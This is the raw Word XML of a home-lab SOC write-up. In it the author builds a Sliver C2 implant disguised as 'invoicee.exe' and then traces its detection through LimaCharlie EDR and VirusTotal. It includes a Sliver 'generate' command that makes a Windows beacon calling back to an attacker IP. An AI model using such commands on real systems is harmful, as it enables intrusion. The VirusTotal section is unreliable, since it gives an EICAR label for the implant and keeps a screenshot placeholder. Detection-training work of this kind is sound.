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18D5" w14:textId="77777777" w:rsidR="00AD74D1" w:rsidRPr="00AD74D1" w:rsidRDefault="00AD74D1" w:rsidP="00AD74D1">
      <w:r w:rsidRPr="00AD74D1">
        <w:pict w14:anchorId="774FEAA2">
          <v:rect id="_x0000_i1058" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hrnoshade="t" o:hr="t" fillcolor="gray" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="5D6B7426" w14:textId="77777777" w:rsidR="00AD74D1" w:rsidRPr="00AD74D1" w:rsidRDefault="00AD74D1" w:rsidP="00AD74D1">
      <w:r w:rsidRPr="00AD74D1">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Project Name:</w:t>
      </w:r>
      <w:r w:rsidRPr="00AD74D1">
        <w:t xml:space="preserve"> Phase 1: Initial Access &amp; Execution Analysis</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="057145D9" w14:textId="77777777" w:rsidR="00AD74D1" w:rsidRPr="00AD74D1" w:rsidRDefault="00AD74D1" w:rsidP="00AD74D1">
      <w:r w:rsidRPr="00AD74D1">
        <w:t xml:space="preserve">Tools Used: Sliver (Attacker), Splunk (SIEM), </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00AD74D1">
        <w:t>LimaCharlie</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00AD74D1">
        <w:t xml:space="preserve"> (EDR)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6591420A" w14:textId="77777777" w:rsidR="00AD74D1" w:rsidRPr="00AD74D1" w:rsidRDefault="00AD74D1" w:rsidP="00AD74D1">
      <w:r w:rsidRPr="00AD74D1">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>1. Executive Summary</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="109F59EB" w14:textId="79C3156A" w:rsidR="00AD74D1" w:rsidRPr="00AD74D1" w:rsidRDefault="00AD74D1" w:rsidP="00AD74D1">
      <w:r w:rsidRPr="00AD74D1">
        <w:t xml:space="preserve">This phase simulates an adversary gaining an initial foothold in the network. A malicious payload named </w:t>
      </w:r>
      <w:r w:rsidRPr="00AD74D1">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>"</w:t>
      </w:r>
      <w:r w:rsidRPr="00FE79D1">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>invoicee</w:t>
      </w:r>
      <w:r w:rsidRPr="00AD74D1">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">.exe" </w:t>
      </w:r>
      <w:r w:rsidRPr="00AD74D1">
        <w:t>was delivered to a victim workstation. The user executed the file, establishing a Command &amp; Control (C2) channel back to the attacker's infrastructure.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4C494F82" w14:textId="77777777" w:rsidR="00AD74D1" w:rsidRPr="00AD74D1" w:rsidRDefault="00AD74D1" w:rsidP="00AD74D1">
      <w:r w:rsidRPr="00AD74D1">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Objective:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="337BFE7A" w14:textId="77777777" w:rsidR="00AD74D1" w:rsidRPr="00AD74D1" w:rsidRDefault="00AD74D1" w:rsidP="00AD74D1">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="6"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00AD74D1">
        <w:t>Detect the execution of an unsigned binary.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="36DE5667" w14:textId="77777777" w:rsidR="00AD74D1" w:rsidRPr="00AD74D1" w:rsidRDefault="00AD74D1" w:rsidP="00AD74D1">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="6"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00AD74D1">
        <w:t>Identify the establishment of a C2 beacon.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="09C191FB" w14:textId="77777777" w:rsidR="00AD74D1" w:rsidRPr="00AD74D1" w:rsidRDefault="00AD74D1" w:rsidP="00AD74D1">
      <w:r w:rsidRPr="00AD74D1">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>2. Attack Simulation (Red Team)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="620A0C58" w14:textId="77777777" w:rsidR="00AD74D1" w:rsidRPr="00AD74D1" w:rsidRDefault="00AD74D1" w:rsidP="00AD74D1">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="7"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00AD74D1">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Tool:</w:t>
      </w:r>
      <w:r w:rsidRPr="00AD74D1">
        <w:t xml:space="preserve"> Sliver C2 Framework</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="368874B8" w14:textId="3BC5E99C" w:rsidR="00AD74D1" w:rsidRDefault="00AD74D1" w:rsidP="00AD74D1">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="7"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00AD74D1">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Command:</w:t>
      </w:r>
      <w:r w:rsidRPr="00AD74D1">
        <w:t xml:space="preserve"> generate --http 192.168.1.101:80 --save /opt/invoicee.exe --</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00AD74D1">
        <w:t>os</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00AD74D1">
        <w:t xml:space="preserve"> windows</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="351C8146" w14:textId="03884ABA" w:rsidR="00AD74D1" w:rsidRPr="00AD74D1" w:rsidRDefault="00AD74D1" w:rsidP="00AD74D1">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="1EA784A2" wp14:editId="1289CA5F">
            <wp:extent cx="5731510" cy="3775075"/>
            <wp:effectExtent l="0" t="0" r="2540" b="0"/>
            <wp:docPr id="10693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4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C075" w14:textId="2110FE70" w:rsidR="00AD74D1" w:rsidRPr="00AD74D1" w:rsidRDefault="00AD74D1" w:rsidP="00AD74D1">
      <w:r>
        <w:t xml:space="preserve">As the picture attached above, a command was </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>ran</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t xml:space="preserve"> that generated a payload called </w:t>
      </w:r>
      <w:r w:rsidRPr="00FE79D1">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>“invoice</w:t>
      </w:r>
      <w:r w:rsidR="00FE79D1" w:rsidRPr="00FE79D1">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>e</w:t>
      </w:r>
      <w:r w:rsidRPr="00FE79D1">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>.exe”</w:t>
      </w:r>
      <w:r w:rsidR="00FE79D1" w:rsidRPr="00FE79D1">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> saved on </w:t>
      </w:r>
      <w:r w:rsidR="00FE79D1" w:rsidRPr="00FE79D1">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>/opt/invoicee.exe</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">. </w:t>
      </w:r>
      <w:r w:rsidR="00FE79D1">
        <w:t xml:space="preserve">From the file’s name, it sounds legit, and </w:t>
      </w:r>
      <w:r w:rsidR="00FE79D1">
        <w:lastRenderedPageBreak/>
        <w:t>that’s the catch. I deliberately made it sounds familiar with other files that user often interacts with, so it’s an advantage for the file to be concealed.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2BF28E23" w14:textId="4C197985" w:rsidR="00AD74D1" w:rsidRDefault="00AD74D1" w:rsidP="00AD74D1">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="7"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00AD74D1">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Delivery:</w:t>
      </w:r>
      <w:r w:rsidRPr="00AD74D1">
        <w:t xml:space="preserve"> Drag-and-drop to Victim "Downloads" folder.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5E3E9B2E" w14:textId="333ACF6C" w:rsidR="001C2BD4" w:rsidRDefault="00FE79D1" w:rsidP="00FE79D1">
      <w:r w:rsidRPr="00FE79D1">
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="017EA214" wp14:editId="41E346BD">
            <wp:extent cx="5731510" cy="2577465"/>
            <wp:effectExtent l="0" t="0" r="2540" b="0"/>
            <wp:docPr id="156686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68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BD4">
        <w:br/>
      </w:r>
    </w:p>
    <w:p w14:paraId="72343A1F" w14:textId="77777777" w:rsidR="001C2BD4" w:rsidRDefault="001C2BD4">
      <w:r>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="730F5948" w14:textId="77777777" w:rsidR="00B01A4E" w:rsidRDefault="001C2BD4" w:rsidP="00FE79D1">
      <w:r w:rsidRPr="001C2BD4">
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="568D3060" wp14:editId="3669D773">
            <wp:extent cx="5731510" cy="2612390"/>
            <wp:effectExtent l="0" t="0" r="2540" b="0"/>
            <wp:docPr id="14372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1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C614" w14:textId="3223CB06" w:rsidR="00FE79D1" w:rsidRPr="00AD74D1" w:rsidRDefault="001C2BD4" w:rsidP="00FE79D1">
      <w:r w:rsidRPr="001C2BD4">
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="5F9355BA" wp14:editId="3FB54626">
            <wp:extent cx="5731510" cy="1061720"/>
            <wp:effectExtent l="0" t="0" r="2540" b="5080"/>
            <wp:docPr id="120733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33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9FA5" w14:textId="77777777" w:rsidR="00AD74D1" w:rsidRPr="00AD74D1" w:rsidRDefault="00AD74D1" w:rsidP="00AD74D1">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="7"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00AD74D1">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Execution:</w:t>
      </w:r>
      <w:r w:rsidRPr="00AD74D1">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00AD74D1">
        <w:t>Manual</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00AD74D1">
        <w:t xml:space="preserve"> double-click by user.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="45FEBB2E" w14:textId="77777777" w:rsidR="001C2BD4" w:rsidRDefault="001C2BD4">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="245048FF" w14:textId="2850FCCB" w:rsidR="00AD74D1" w:rsidRPr="00AD74D1" w:rsidRDefault="00AD74D1" w:rsidP="00AD74D1">
      <w:r w:rsidRPr="00AD74D1">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>3. Technical Analysis (Blue Team)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="370D2020" w14:textId="1F2CECB5" w:rsidR="00AD74D1" w:rsidRPr="00AD74D1" w:rsidRDefault="005F59D9" w:rsidP="00AD74D1">
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">Step 1: </w:t>
      </w:r>
      <w:r w:rsidR="00AD74D1" w:rsidRPr="00AD74D1">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> Process Execution</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0D963C07" w14:textId="77777777" w:rsidR="00AD74D1" w:rsidRDefault="00AD74D1" w:rsidP="00AD74D1">
      <w:r w:rsidRPr="00AD74D1">
        <w:t>Observation:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7E6D1061" w14:textId="1B8C8518" w:rsidR="00BE0A10" w:rsidRDefault="00BE0A10" w:rsidP="00AD74D1">
      <w:r w:rsidRPr="00BE0A10">
        <w:t xml:space="preserve">Here we can see alerts generated by </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00BE0A10">
        <w:t>LimaCharlie</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00BE0A10">
        <w:t xml:space="preserve"> EDR indicating suspicious activity on the host </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00BE0A10">
        <w:t>fadhli-</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00BE0A10">
        <w:t>pc.redgunn</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00BE0A10">
        <w:t>.local</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00BE0A10">
        <w:t>. The alerts include YARA detections in memory, execution of a file from the user Downloads directory</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6A00877C" w14:textId="67638CA0" w:rsidR="001458A1" w:rsidRPr="00AD74D1" w:rsidRDefault="001458A1" w:rsidP="00AD74D1">
      <w:r w:rsidRPr="001458A1">
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="7116C4DE" wp14:editId="6DA4836E">
            <wp:extent cx="5731510" cy="746125"/>
            <wp:effectExtent l="0" t="0" r="2540" b="0"/>
            <wp:docPr id="181996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61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8832" w14:textId="43E665EE" w:rsidR="00AD74D1" w:rsidRPr="00AD74D1" w:rsidRDefault="00AD74D1" w:rsidP="00AD74D1">
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00AD74D1">
        <w:t>LimaCharlie</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00AD74D1">
        <w:t xml:space="preserve"> EDR detected the spawning of a new process "</w:t>
      </w:r>
      <w:r w:rsidR="001458A1">
        <w:t>invoicee</w:t>
      </w:r>
      <w:r w:rsidRPr="00AD74D1">
        <w:t>.exe". The parent process was "explorer.exe", indicating manual user execution rather than lateral movement (which would likely stem from services.exe or wmiprvse.exe).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="523AD415" w14:textId="77777777" w:rsidR="00AD74D1" w:rsidRDefault="00AD74D1" w:rsidP="00AD74D1">
      <w:r w:rsidRPr="00AD74D1">
        <w:t>Process Tree:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="45D9EDF4" w14:textId="01D7F6A8" w:rsidR="00BE0A10" w:rsidRPr="00AD74D1" w:rsidRDefault="00BE0A10" w:rsidP="005F59D9">
      <w:pPr>
        <w:ind w:left="360"/>
      </w:pPr>
      <w:r w:rsidRPr="00BE0A10">
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="1B460E50" wp14:editId="2A2BF8F6">
            <wp:extent cx="5731510" cy="3063875"/>
            <wp:effectExtent l="0" t="0" r="2540" b="3175"/>
            <wp:docPr id="133907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79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9D9" w:rsidRPr="005F59D9">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:kern w:val="0"/>
          <w:lang w:eastAsia="en-MY"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="005F59D9" w:rsidRPr="005F59D9">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Evidence Collected:</w:t>
      </w:r>
      <w:r w:rsidR="005F59D9" w:rsidRPr="005F59D9">
        <w:t xml:space="preserve"> "C:\Users\FADWIN10\Downloads\invoicee.exe"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7DFEB736" w14:textId="77777777" w:rsidR="00BE0A10" w:rsidRDefault="00BE0A10" w:rsidP="00AD74D1">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:br/>
      </w:r>
    </w:p>
    <w:p w14:paraId="132AD890" w14:textId="77777777" w:rsidR="00BE0A10" w:rsidRDefault="00BE0A10">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="43602694" w14:textId="77777777" w:rsidR="00282901" w:rsidRPr="00282901" w:rsidRDefault="00282901" w:rsidP="00282901">
      <w:pPr>
        <w:ind w:left="720"/>
      </w:pPr>
      <w:r w:rsidRPr="00282901">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Step 2: File Hash Investigation (Threat Intelligence)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5AB4CAF7" w14:textId="77777777" w:rsidR="00282901" w:rsidRPr="00282901" w:rsidRDefault="00282901" w:rsidP="00282901">
      <w:pPr>
        <w:ind w:left="720"/>
      </w:pPr>
      <w:r w:rsidRPr="00282901">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Action:</w:t>
      </w:r>
      <w:r w:rsidRPr="00282901">
        <w:t xml:space="preserve"> The SOC Analyst extracted the SHA256 hash of the suspicious binary (invoicee.exe) from the EDR telemetry to perform a reputation check against global threat databases.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="67993FBD" w14:textId="77777777" w:rsidR="00282901" w:rsidRPr="00AD74D1" w:rsidRDefault="00282901" w:rsidP="00282901">
      <w:r w:rsidRPr="00AD74D1">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Artifacts:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7D2F10D8" w14:textId="77777777" w:rsidR="00282901" w:rsidRPr="00AD74D1" w:rsidRDefault="00282901" w:rsidP="00282901">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="8"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00AD74D1">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>File Path:</w:t>
      </w:r>
      <w:r w:rsidRPr="00AD74D1">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00BE0A10">
        <w:t>"C:\Users\FADWIN10\Downloads\invoicee.exe"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="11A630D9" w14:textId="77777777" w:rsidR="00282901" w:rsidRPr="00AD74D1" w:rsidRDefault="00282901" w:rsidP="00282901">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="8"/>
        </w:numPr>
      </w:pPr>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00AD74D1">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Hash :</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00AD74D1">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00BE0A10">
        <w:t>019b1291301dcf37569e80f7db6848c42b76d0b12196609965090d69e471d968</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2FACAA68" w14:textId="77777777" w:rsidR="00282901" w:rsidRDefault="00282901" w:rsidP="00282901">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="8"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00AD74D1">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Signer:</w:t>
      </w:r>
      <w:r w:rsidRPr="00AD74D1">
        <w:t xml:space="preserve"> Unsigned / Unknown Publisher</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0E122CC1" w14:textId="77777777" w:rsidR="00282901" w:rsidRPr="00BE0A10" w:rsidRDefault="00282901" w:rsidP="00282901">
      <w:r w:rsidRPr="00BE0A10">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Intelligence Check (</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00BE0A10">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>VirusTotal</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00BE0A10">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>):</w:t>
      </w:r>
      <w:r w:rsidRPr="00BE0A10">
        <w:t xml:space="preserve"> The hash was queried against </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00BE0A10">
        <w:t>VirusTotal</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00BE0A10">
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6A4B9AD6" w14:textId="77777777" w:rsidR="00282901" w:rsidRDefault="00282901" w:rsidP="00282901">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="12"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00BE0A10">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Result:</w:t>
      </w:r>
      <w:r w:rsidRPr="00BE0A10">
        <w:t xml:space="preserve"> "No Matches Found" / 0 Detections.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="718002D1" w14:textId="77777777" w:rsidR="00282901" w:rsidRPr="00BE0A10" w:rsidRDefault="00282901" w:rsidP="00282901">
      <w:pPr>
        <w:ind w:left="720"/>
      </w:pPr>
      <w:r w:rsidRPr="00BE0A10">
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="2BAF1B99" wp14:editId="77C28C27">
            <wp:extent cx="5731510" cy="1819910"/>
            <wp:effectExtent l="0" t="0" r="2540" b="8890"/>
            <wp:docPr id="193418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53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0E86" w14:textId="7869B438" w:rsidR="00282901" w:rsidRDefault="00282901" w:rsidP="00282901">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="12"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00BE0A10">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Analyst Assessment:</w:t>
      </w:r>
      <w:r w:rsidRPr="00BE0A10">
        <w:t xml:space="preserve"> The lack of signature match indicates this is </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00BE0A10">
        <w:t xml:space="preserve">not </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> a</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t xml:space="preserve"> known </w:t>
      </w:r>
      <w:r w:rsidRPr="00BE0A10">
        <w:t>malware. It is likely a custom-compiled payload or a targeted polymorphic dropper. A binary with zero global reputation appearing in the "Downloads" folder is classified as Highly Suspicious.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5393458B" w14:textId="482CF47D" w:rsidR="00282901" w:rsidRPr="00282901" w:rsidRDefault="00282901" w:rsidP="00282901">
      <w:pPr>
        <w:ind w:left="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>After that, I uploaded the file directly to the VT as to introduce it to the VT and go through all the analysis from various of AV products.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2D0E3E73" w14:textId="77777777" w:rsidR="00282901" w:rsidRPr="00282901" w:rsidRDefault="00282901" w:rsidP="00282901">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="16"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00282901">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Result:</w:t>
      </w:r>
      <w:r w:rsidRPr="00282901">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00282901">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>CRITICAL MATCH (58/70 Vendors)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="167E9D0B" w14:textId="77777777" w:rsidR="00282901" w:rsidRPr="00282901" w:rsidRDefault="00282901" w:rsidP="00282901">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="16"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00282901">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Classification:</w:t>
      </w:r>
      <w:r w:rsidRPr="00282901">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00282901">
        <w:t>Trojan.Generic</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00282901">
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00282901">
        <w:t>Malware.Heuristic</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00282901">
        <w:t>, EICAR-Test-Signature.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="125B6B9E" w14:textId="77777777" w:rsidR="00282901" w:rsidRPr="00282901" w:rsidRDefault="00282901" w:rsidP="00282901">
      <w:pPr>
        <w:ind w:left="720"/>
      </w:pPr>
      <w:r w:rsidRPr="00282901">
        <w:t xml:space="preserve">[Paste your new </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00282901">
        <w:t>VirusTotal</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00282901">
        <w:t xml:space="preserve"> Screenshot with Red Flags here]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="583C3DDA" w14:textId="77777777" w:rsidR="00282901" w:rsidRPr="00282901" w:rsidRDefault="00282901" w:rsidP="00282901">
      <w:pPr>
        <w:ind w:left="720"/>
      </w:pPr>
      <w:r w:rsidRPr="00282901">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Analyst Assessment:</w:t>
      </w:r>
      <w:r w:rsidRPr="00282901">
        <w:t xml:space="preserve"> The file is confirmed as malicious. Multiple vendors identify the binary signature as a known threat. The high detection rate confirms this is not a false positive.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1A1DA98B" w14:textId="77777777" w:rsidR="00282901" w:rsidRPr="00282901" w:rsidRDefault="00282901" w:rsidP="00282901">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="17"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00282901">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Decision:</w:t>
      </w:r>
      <w:r w:rsidRPr="00282901">
        <w:t xml:space="preserve"> Immediate escalation to containment.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3AACB3D8" w14:textId="0E69E0AF" w:rsidR="00BE0A10" w:rsidRPr="00BE0A10" w:rsidRDefault="00282901" w:rsidP="00AD74D1">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="17"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00282901">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Indicator Type:</w:t>
      </w:r>
      <w:r w:rsidRPr="00282901">
        <w:t xml:space="preserve"> Atomic Indicator (Known Bad Hash).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6FE512BF" w14:textId="58E2FCB4" w:rsidR="00AD74D1" w:rsidRPr="00AD74D1" w:rsidRDefault="00BE0A10" w:rsidP="00BE0A10">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
